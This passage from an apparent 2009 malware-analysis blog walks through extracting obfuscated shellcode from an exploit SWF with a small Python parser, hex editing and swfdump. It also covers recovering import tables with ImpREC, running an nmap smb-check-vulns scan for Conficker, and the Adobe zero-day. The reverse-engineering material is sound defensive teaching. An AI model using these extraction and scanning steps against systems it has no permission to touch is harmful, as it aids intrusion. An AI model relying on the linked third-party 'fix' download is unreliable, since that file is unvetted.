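    body += tag(TAG_DEFINEBITS, bits_payload)
    body += tag(TAG_SHOWFRAME, b"") + tag(TAG_END, b"")
    return b"CWS\x09" + struct.pack("<I", 8 + len(body)) + zlib.compress(body)


if __name__ == "__main__":
    blob = b"\x01\x00" + bytes(range(256)) * 2           # CharacterID + placeholder data
    hex_operand = build_test_swf(blob).hex()             # what a pushstring would carry
    swf = decompress_swf(pushstring_to_bytes(hex_operand))
    for start, end, payload in find_definebits(swf):
        print("DEFINEBITS payload at 0x%x..0x%x (%d bytes)" % (start, end, len(payload)))
```

On a real sample the payload returned by `find_definebits()` is the obfuscated shellcode the post carves out by hand between its first and last bytes; the offsets printed are the same ones swfdump reports for the tag, so the two can be cross-checked.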
After that press <span style="font-weight: bold;">Ctrl + H </span>to switch to hex mode:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzfrqbvxCzxnwwVU1tTcu1D-eqbvR22wwp7h28xNwsXhKVUlYjtu2cpmCOuEnz6HfmxN-4Veye6OX1RqYbWqg6qhntTR1Qhdh8sSxCZ_4b5TqiVyOyeDwIXiZePYAezqMOh0EvEXxm8dhL/s1600-h/exploit_swf_2.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 197px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzfrqbvxCzxnwwVU1tTcu1D-eqbvR22wwp7h28xNwsXhKVUlYjtu2cpmCOuEnz6HfmxN-4Veye6OX1RqYbWqg6qhntTR1Qhdh8sSxCZ_4b5TqiVyOyeDwIXiZePYAezqMOh0EvEXxm8dhL/s320/exploit_swf_2.JPG" alt="" id="BLOGGER_PHOTO_ID_5339401183774925090" border="0" /></a><br />Double click <span style="font-weight: bold;">20 </span>and press <span style="font-weight: bold;">Ctrl + R</span><span style="font-weight: bold;"> </span>to replace the space with hex string:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-4PIZMpPzcLpf6WV99fgfFtqMRVhJiHxKtizF4h2MeUC14TrgWtky2mjC_cYpKzGmfAeJ6SSYmaFdvp8Q3cTYMPpcP3f3KPivvdJRh05hyfFvrX12ugiUk0UtqnaeCDCCU_AK9HisVyEd/s1600-h/exploit_swf_3.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 183px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-4PIZMpPzcLpf6WV99fgfFtqMRVhJiHxKtizF4h2MeUC14TrgWtky2mjC_cYpKzGmfAeJ6SSYmaFdvp8Q3cTYMPpcP3f3KPivvdJRh05hyfFvrX12ugiUk0UtqnaeCDCCU_AK9HisVyEd/s320/exploit_swf_3.JPG" alt="" id="BLOGGER_PHOTO_ID_5339402879322872066" border="0" /></a><br />Click <span style="font-weight: bold;">Replace All </span>button and the result would be:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAaFjlbkG0qncaJT4OoFr4JJlXgRdxapYTdGf_h7hqEYQBQVKBVxd5OgHICEB44-sI_FwS7H7Pp0Qsy6inowmwP-l1aptTo-lTFpduZm9eQJQ62M1l2ztSSXP3S2C08iIky2cQvPmj8GXa/s1600-h/exploit_swf_4.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 196px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAaFjlbkG0qncaJT4OoFr4JJlXgRdxapYTdGf_h7hqEYQBQVKBVxd5OgHICEB44-sI_FwS7H7Pp0Qsy6inowmwP-l1aptTo-lTFpduZm9eQJQ62M1l2ztSSXP3S2C08iIky2cQvPmj8GXa/s320/exploit_swf_4.JPG" alt="" id="BLOGGER_PHOTO_ID_5339403411599971650" border="0" /></a><br />Under Hiew:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNCYkSPLwYBjr6nQgJOh5K0SbN7YO2qvKDXYuQ-NIDPiyE3yRnpQx2YwQb0zyGqadSWXt2xORK3j4NKBAz5Sa1ormVNeILOmXPWsaUCjP7vR_kY8gTkcSJJvkOgSOQhBjJ_GA7EX_yxS5_/s1600-h/exploit_swf_5.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 284px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNCYkSPLwYBjr6nQgJOh5K0SbN7YO2qvKDXYuQ-NIDPiyE3yRnpQx2YwQb0zyGqadSWXt2xORK3j4NKBAz5Sa1ormVNeILOmXPWsaUCjP7vR_kY8gTkcSJJvkOgSOQhBjJ_GA7EX_yxS5_/s320/exploit_swf_5.JPG" alt="" id="BLOGGER_PHOTO_ID_5339404081807077170" border="0" /></a><br />It is now more readable right ;)<br /><br />Now we can use <span style="font-style: italic;">swfdump.exe </span>again to see the tag and we need to find <span style="font-weight: bold;">DEFINEBITS </span>section where the shellcode is located:<br /><br /><blockquote style="font-family: courier new;">C:\bin\swftools\swfdump.exe -atpdu exploit_swf > exploit_swf.swfdump</blockquote><br />Output:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIdMqZDhwVyCdYMRU9dkgDx_ZpDlqtxJ2nZuXFHKM0jjcSsdygdLSyNoGSmqjJEDXunZ3iX2lQmw0mUQgEzyE_zpSYOaUhYRuitncevNXZPgjiQgbWd76zVTwEWaH2EIdB0AlRXjnQIpK0/s1600-h/shellcode_1.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 283px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIdMqZDhwVyCdYMRU9dkgDx_ZpDlqtxJ2nZuXFHKM0jjcSsdygdLSyNoGSmqjJEDXunZ3iX2lQmw0mUQgEzyE_zpSYOaUhYRuitncevNXZPgjiQgbWd76zVTwEWaH2EIdB0AlRXjnQIpK0/s320/shellcode_1.JPG" alt="" id="BLOGGER_PHOTO_ID_5339407609176075554" border="0" /></a><br />From the <span style="font-weight: bold;">DEFINEBITS </span> section, we can determine the starting offset of the shellcode as well as its end offset:<br /><br />[image continuation]<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRkic240983iRqi1bSF8uQcgMOXRHJ-HRKI2a6HaVPLcsKktlSGfbhfTG0H8UGrpvG6tGtREi78L9-qKIhNF8Z0oaI8ANEyWc-S9TsRm_sINS9K77BOixhUf3DBh2xMo0v5Kp1J_TFLLzH/s1600-h/shellcode_2.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 286px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRkic240983iRqi1bSF8uQcgMOXRHJ-HRKI2a6HaVPLcsKktlSGfbhfTG0H8UGrpvG6tGtREi78L9-qKIhNF8Z0oaI8ANEyWc-S9TsRm_sINS9K77BOixhUf3DBh2xMo0v5Kp1J_TFLLzH/s320/shellcode_2.JPG" alt="" id="BLOGGER_PHOTO_ID_5339410062810872482" border="0" /></a><br />So we should find the range from <span style="font-weight: bold;">aa 02 34 d1 </span>to <span style="font-weight: bold;">11 67 8a 37</span> using any hex editor you like:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEoO42nK-IRuGa8l0TBH2YGNA5ABM14rC3elk101J6QPDLs2zii-EOb11zf-ERAIr8lUwfU_p0bWxhldMwkDxMpHhd8Lv5Ii-aFMnP5koSHNPvRmCl3R4jMqQhUuSuYPUhaeHK6Pxvmpto/s1600-h/shellcode_3.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 314px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEoO42nK-IRuGa8l0TBH2YGNA5ABM14rC3elk101J6QPDLs2zii-EOb11zf-ERAIr8lUwfU_p0bWxhldMwkDxMpHhd8Lv5Ii-aFMnP5koSHNPvRmCl3R4jMqQhUuSuYPUhaeHK6Pxvmpto/s320/shellcode_3.JPG" alt="" id="BLOGGER_PHOTO_ID_5339411742442573666" border="0" /></a><br />continuation:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCasx7OkmTj4Sj8yAirHFhaBl3in4-BdQIJgNb1MMRLOaIifbAQebQ_vNuRjbRK8ivax42ME5JLzgSfdRFHgampmtAfisUtr_Qd2ermwVnDK6UUxc-ViqutH8sdrmNXgsIN0MextqZlHHO/s1600-h/shellcode_3_1.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 314px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCasx7OkmTj4Sj8yAirHFhaBl3in4-BdQIJgNb1MMRLOaIifbAQebQ_vNuRjbRK8ivax42ME5JLzgSfdRFHgampmtAfisUtr_Qd2ermwVnDK6UUxc-ViqutH8sdrmNXgsIN0MextqZlHHO/s320/shellcode_3_1.JPG" alt="" id="BLOGGER_PHOTO_ID_5339412186279816418" border="0" /></a><br />And the obfuscated shellcode looks like this:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRQH1LtOFyGoxxxOfG_onIRnk2CciPfCqZ-ivXaau6wMtB0GTDxLnAGC6c6PbHIizELNW8ock5rOVpvE_zF0m3fpvVKcvVGCkqPcvDQQgFOLvnUuPsne05JHCT8N6lc5XrzzotnM6Y-ggB/s1600-h/shellcode_obfuscated.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 285px;" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRQH1LtOFyGoxxxOfG_onIRnk2CciPfCqZ-ivXaau6wMtB0GTDxLnAGC6c6PbHIizELNW8ock5rOVpvE_zF0m3fpvVKcvVGCkqPcvDQQgFOLvnUuPsne05JHCT8N6lc5XrzzotnM6Y-ggB/s320/shellcode_obfuscated.JPG" alt="" id="BLOGGER_PHOTO_ID_5341472945517848386" border="0" /></a><br /><br /><span style="font-weight: bold;">Conclusion</span><br /><br />We got the shellcode from the exploit SWF, but we still do not know what its payload is. In the next part, I will explain how to deobfuscate the shellcode by looking for the "key" used to obfuscate it, and some common techniques used in shellcode, like using the PEB to find kernel32.dll and then looking for the address of LoadLibrary to load the necessary APIs in order to execute its payload.<br /><br /><br />To be continued...<br /><br /><span style="font-weight: bold;">Manual IAT Recovery Using ImpREC</span> (x9090, published 2009-04-04, updated 2009-07-21)<br /><br />There are a lot of tutorials on the Internet teaching how to use ImpREC to recover the Import Address Table (IAT). But those tutorials only cover the "Auto IAT Search" function of ImpREC.
Sometimes the "auto" function is not able to fully recover the IAT, which leaves unresolved imports like this:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWbVZx_0bL7J2qR8ehxEPKyttNcTv1eqZRmdm857EojNH-drJEbLvFN5rWDUpe0BAjViJ0Lq8GmhtzmnhIkDpkU7_16J45sz0Xh4XN2gUecb22TCeUlwLSU0CtbRcJot0-Kpm31S2x25Ml/s1600-h/idapro_unresolv.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 154px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWbVZx_0bL7J2qR8ehxEPKyttNcTv1eqZRmdm857EojNH-drJEbLvFN5rWDUpe0BAjViJ0Lq8GmhtzmnhIkDpkU7_16J45sz0Xh4XN2gUecb22TCeUlwLSU0CtbRcJot0-Kpm31S2x25Ml/s320/idapro_unresolv.JPG" alt="" id="BLOGGER_PHOTO_ID_5320670027046390306" border="0" /></a><br />How do we determine which APIs are unresolved? Try using OllyDbg: find the OEP (it is fairly easy to find if the sample was packed by UPX ;) ), and use <span style="font-weight: bold;">Follow in Dump -> Memory Address</span> on any API call, for example:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic1WFT9-z1t4LqCloH2YQnwbMvkzodttsH8lBcTU5J1OvXymOSLpV1KmdVaeARIQpiTwTDx4yxeMdnioKpyevW_iXiAVGqd7n4JUSbHHwArjFpklCg4FNHrOnx_V7lMYkH7MCp8V79_mS5/s1600-h/ollydbg_follow_in_dump.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 204px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic1WFT9-z1t4LqCloH2YQnwbMvkzodttsH8lBcTU5J1OvXymOSLpV1KmdVaeARIQpiTwTDx4yxeMdnioKpyevW_iXiAVGqd7n4JUSbHHwArjFpklCg4FNHrOnx_V7lMYkH7MCp8V79_mS5/s320/ollydbg_follow_in_dump.JPG" alt="" id="BLOGGER_PHOTO_ID_5320672064411588402" border="0" /></a><br />Now in the <span style="font-weight: bold;">Memory Dump </span>window, switch to <span style="font-weight: bold;">Address </span>view and then you can see the list of APIs:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTaPNe9xbEHgfC7y1cfp7vvrJb2eq-B2GwHLlny1FlRNj3g1Er6FRMtFEKnYzEv9w3FRgL-9HMKXMaWg2MASLbDZwQOTjGeQFC-7KK4ApdEK5Rn87iviU35C7v7BDH2dYP85RinFwwvAy5/s1600-h/ollydb_address_view.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 223px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTaPNe9xbEHgfC7y1cfp7vvrJb2eq-B2GwHLlny1FlRNj3g1Er6FRMtFEKnYzEv9w3FRgL-9HMKXMaWg2MASLbDZwQOTjGeQFC-7KK4ApdEK5Rn87iviU35C7v7BDH2dYP85RinFwwvAy5/s320/ollydb_address_view.JPG" alt="" id="BLOGGER_PHOTO_ID_5320672901347688098" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsBqrcaW00hVKwi5wChBZ0I5MZWj9YMYFXfKxVwRYapx2ocqEPC3DwJvF_xieE9Xh0KFTo6KejuUO8OfiSEwBsbfZ15HS0OwBnc9dxljDvW1RbEytc4sb6K3SIrTpJFSAkQwbekVN6rdVE/s1600-h/ollydbg_list_apis.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 223px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsBqrcaW00hVKwi5wChBZ0I5MZWj9YMYFXfKxVwRYapx2ocqEPC3DwJvF_xieE9Xh0KFTo6KejuUO8OfiSEwBsbfZ15HS0OwBnc9dxljDvW1RbEytc4sb6K3SIrTpJFSAkQwbekVN6rdVE/s320/ollydbg_list_apis.JPG" alt="" id="BLOGGER_PHOTO_ID_5320673792574057906" border="0" /></a><br />These are the IAT entries that we missed just now when loading the file into IDA. So the next thing is to recover them so that we can continue the static analysis in IDA. Scroll up until you reach an address holding zero bytes (a null entry), which marks the beginning of the IAT (RVA 491cc), and scroll down until the next address holding zero bytes, which marks the end of the IAT (RVA 49338).<br /><br />Dump the sample using OllyDump; then we can start ImpREC to recover the IAT using the starting RVA we found just now.
Using the <span style="font-weight: bold;">AutoSearch </span>button will give us:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTIWimzBE4L4SxoOaIUMyuqe1KqjisM23UcZNOlwj9WNGLGwQlo0kRdNGr5Bcxbx5K-Md0IH-c8ZDvZXdSUVbr8hWLJDAGA_goq4eTW5Oe108LJwzRTqbIWQqXTHRuz16bfnhuWSXJXl0l/s1600-h/imprec_iat_autosearch.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 317px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTIWimzBE4L4SxoOaIUMyuqe1KqjisM23UcZNOlwj9WNGLGwQlo0kRdNGr5Bcxbx5K-Md0IH-c8ZDvZXdSUVbr8hWLJDAGA_goq4eTW5Oe108LJwzRTqbIWQqXTHRuz16bfnhuWSXJXl0l/s320/imprec_iat_autosearch.JPG" alt="" id="BLOGGER_PHOTO_ID_5320678006248303474" border="0" /></a><br />Notice that the original IAT RVA found at 49284 seems to be incorrect. If you fix the dump with this option you will see the unresolved APIs as shown in the first figure. 
So we need to set the <span style="font-weight: bold;">OEP</span>, <span style="font-weight: bold;">RVA </span>and <span style="font-weight: bold;">Size </span><span>(49338-491cc)</span> manually and select <span style="font-weight: bold;">Get Imports</span>:<br /><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuXMcJ_58aMOhCJEeqAaSfPowF4ZthpOaDwinks7Bbzm6WZ-z84hZrVOyocpBT7O4WSQL5KdFxvcpYaNtllrNzOv93sX1oYRAHi2ho3TfO3euwBVAEwLTvX8kBHbfMNVVLSG7jgfk69pgg/s1600-h/imprec_recover_iat.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 317px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuXMcJ_58aMOhCJEeqAaSfPowF4ZthpOaDwinks7Bbzm6WZ-z84hZrVOyocpBT7O4WSQL5KdFxvcpYaNtllrNzOv93sX1oYRAHi2ho3TfO3euwBVAEwLTvX8kBHbfMNVVLSG7jgfk69pgg/s320/imprec_recover_iat.JPG" alt="" id="BLOGGER_PHOTO_ID_5320683428748432866" border="0" /></a>We can now fix the dump using the <span style="font-weight: bold;">Fix Dump</span> button; select the file that was dumped by OllyDbg just now. Done!
Next we can load it into IDA and see the result:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT-EoViZB9gFx8YuHITTSHhaI9MHs7wsPShY0pMUJml2OK85uWcwW980sK5SL83rrbU5upQuPouRphSaL4fge1BOdOFdTKyzJsRsen5NKvASOdCJ0DeL7ccm9oMWX2e4muk8h36G1mX_BE/s1600-h/idapro_resolv.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 155px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT-EoViZB9gFx8YuHITTSHhaI9MHs7wsPShY0pMUJml2OK85uWcwW980sK5SL83rrbU5upQuPouRphSaL4fge1BOdOFdTKyzJsRsen5NKvASOdCJ0DeL7ccm9oMWX2e4muk8h36G1mX_BE/s320/idapro_resolv.JPG" alt="" id="BLOGGER_PHOTO_ID_5320684970118184146" border="0" /></a><br />Signing off<br />~x9090<br /><br /><span style="font-weight: bold;">Customd Detection and Removal Tool</span> (x9090, published 2009-04-01, updated 2009-04-01)<br /><br />A big April Fools' worm was set to activate today, but it seems that the worm has left many security experts disappointed. There is no major havoc caused by this worm yet (at least at the time of writing this post, 12:05 GMT).<br /><br />For those who suspect their PC is infected with this worm, the easiest way to find out is by visiting some security-related websites, for example:<br /><br /><ul><li>www.symantec.com</li><li>www.microsoft.com</li><li>www.macfee.com</li><li>www.f-secure.com</li></ul>etc.<br /><br />Conficker/Downadup was designed to block the infected machine from visiting these security websites, to prevent victims from finding a solution to remove this worm.
For more technical details on how it prevents the machine from visiting the websites (by hooking the Windows API <span style="font-style: italic;">DnsQuery</span> from dnsapi.dll):<br /><br /><a href="http://mtc.sri.com/Conficker/addendumC/">http://mtc.sri.com/Conficker/addendumC/</a> <-- This is so far the most consolidated analysis that I have ever seen :)<br /><br />The following website consolidates the detection and removal methods for Conficker/Downadup, from <span style="font-style: italic;">dShield</span>:<br /><br /><br /><a href="http://www.dshield.org/diary.html?storyid=5860">http://www.dshield.org/diary.html?storyid=5860</a><br /><br /><br /><span style="font-weight: bold;">Using Nmap to Perform Conficker Test</span><br /><br />I was attracted by the new Nmap scanning features, which include a script to scan your network to test if you are infected with Conficker, thanks to the Honeynet Project (Tillmann Werner and Felix Leder) :D<br /><br /><span style="font-weight: bold;">nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 [host]</span><br /><br />Typical scan result for an infected machine:<br /><br /><blockquote>Host script results:<br />| smb-check-vulns:<br />| MS08-067: FIXED<br />| Conficker: Likely INFECTED<br />|_ regsvc DoS: VULNERABLE</blockquote><br />The testing was done using <a href="http://nmap.ucsd.edu/nmap/dist/nmap-4.85BETA6-win32.zip"><span style="font-weight: bold;">Nmap 4.85BETA6</span></a><br /><br />Signing off<br />~x9090<br /><br /><span style="font-weight: bold;">Adobe Reader 9 and Acrobat 9 0Day Vulnerability</span> (x9090, published 2009-03-01, updated 2009-07-21)<br /><br />Adobe Reader 9 and Acrobat 9 were found to be vulnerable to a 0day exploit; Adobe is planning to release the patches on 11th March 2009:<br /><br /><a href="http://secunia.com/blog/44/">http://secunia.com/blog/44/</a><br /><br />In the first place, security specialists said that users can be protected by disabling JavaScript in Adobe Reader; a fix for this can be found here:<br /><br /><a href="http://www.4shared.com/file/90132463/a01aa640/Adobe_JS_Fix.html">http://www.4shared.com/file/90132463/a01aa640/Adobe_JS_Fix.html</a><br /><br /><br />Later, security specialists from Secunia reported that disabling JavaScript does not eliminate all the risk; more information can be found here:<br /><br /><a href="http://www.adobe.com/support/security/advisories/apsa09-01.html">http://www.adobe.com/support/security/advisories/apsa09-01.html</a><br /><br /><span style="font-weight: bold;">Conclusion</span><br /><br />The only mitigation is to avoid opening PDF documents from unknown sources, or to cross your fingers and wait for 11th March 2009 to arrive :)<br /><br /><span style="font-weight: bold;">Now is F-Secure??</span> (x9090, published 2009-02-12, updated 2009-07-21)<br /><br />Another security company, F-Secure, which shares the same fate as Kaspersky, was hacked today. However, the hacker claimed that no sensitive information was leaked this time.<br /><br />More information:<br /><br /><a href="http://hackersblog.org/2009/02/11/f-securecom-sql-injection-cross-site-scripting/">http://hackersblog.org/2009/02/11/f-securecom-sql-injection-cross-site-scripting/</a><br /><a href="http://www.theregister.co.uk/2009/02/11/psystart_website/">http://www.theregister.co.uk/2009/02/11/psystart_website/</a>